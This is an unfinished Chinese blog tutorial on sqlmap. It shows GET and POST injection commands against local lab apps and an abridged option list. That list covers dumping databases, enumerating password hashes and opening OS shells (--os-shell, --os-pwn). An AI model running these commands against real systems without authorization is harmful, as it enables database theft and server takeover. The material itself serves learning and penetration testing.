• Sqlmap用法整理中


    1,基本用法

    get型:

    sqlmap -u "http://192.168.2.105:5907/xxxx/vulnerabilities/sqli/?id=1" --cookie "PHPSESSID=0xxxxxxx3a8d8417170d2cd; security=low"

    sqlmap -u "http://192.168.2.105:9081/pikachu/vul/sqli/sqli_str.php?name=kebo&submit=%E6%9F%A5%E8%AF%A2"

    -u表链接。url为注入点,--cookie从浏览器或代理或抓包工具处获得。--data为表单数据

    在需要cookie时如无,往往会发生重定向。cookie也可以由sqlmap生成,但一般是随机的。set-cookie是http头中一个字段由服务器端下发的一个字段。

    post型:

    sqlmap -u "192.168.2.105:9081/xxxxxx/vul/sqli/sqli_id.php " --data="id=4&submit=%E6%9F%A5%E8%AF%A2" id=4&submit=%E6%9F%A5%E8%AF%A2

    2,探索

    3,全部参数

    Usage: python3 sqlmap [options]

    Options:
    -h, --help Show basic help message and exit
    -hh Show advanced help message and exit
    --version Show program's version number and exit
    -v VERBOSE Verbosity level: 0-6 (default 1)

    Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK Process Google dork results as target URLs

    Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --random-agent Use randomly selected HTTP User-Agent header value
    --proxy=PROXY Use a proxy to connect to the target URL
    --tor Use Tor anonymity network
    --check-tor Check to see if Tor is used properly

    Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER Testable parameter(s)
    --dbms=DBMS Force back-end DBMS to provided value

    Detection:
    These options can be used to customize the detection phase

    --level=LEVEL Level of tests to perform (1-5, default 1)
    --risk=RISK Risk of tests to perform (1-3, default 1)

    Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH.. SQL injection techniques to use (default "BEUSTQ")

    Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all Retrieve everything
    -b, --banner Retrieve DBMS banner
    --current-user Retrieve DBMS current user
    --current-db Retrieve DBMS current database
    --passwords Enumerate DBMS users password hashes
    --tables Enumerate DBMS database tables
    --columns Enumerate DBMS database table columns
    --schema Enumerate DBMS schema
    --dump Dump DBMS database table entries
    --dump-all Dump all DBMS databases tables entries
    -D DB DBMS database to enumerate
    -T TBL DBMS database table(s) to enumerate
    -C COL DBMS database table column(s) to enumerate

    Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell Prompt for an interactive operating system shell
    --os-pwn Prompt for an OOB shell, Meterpreter or VNC

    General:
    These options can be used to set some general working parameters

    --batch Never ask for user input, use the default behavior
    --flush-session Flush session files for current target

    Miscellaneous:
    These options do not fit into any other category

    --wizard Simple wizard interface for beginner users

    [!] to see full list of options run with '-hh'

  • 相关阅读:
    CodeForces 383C-dfs序-线段树
    poj-3321-dfs序-线段树-邻接表
    poj2528-Mayor's posters-线段树离散化、基础
    hdu3333-Turing Tree-线段树+离线+离散化
    poj 1151-atlantis-线段树扫描线求面积并
    Changes favor the connective minds.
    HDU 4800/zoj 3735 Josephina and RPG 2013 长沙现场赛J题
    HDU 1203 I NEED A OFFER! 01背包
    hdu 1175 连连看 DFS
    Codeforces Round #208 (Div. 2) 358D Dima and Hares
  • 原文地址:https://www.cnblogs.com/augustone/p/16358235.html
Copyright © 2020-2023  润新知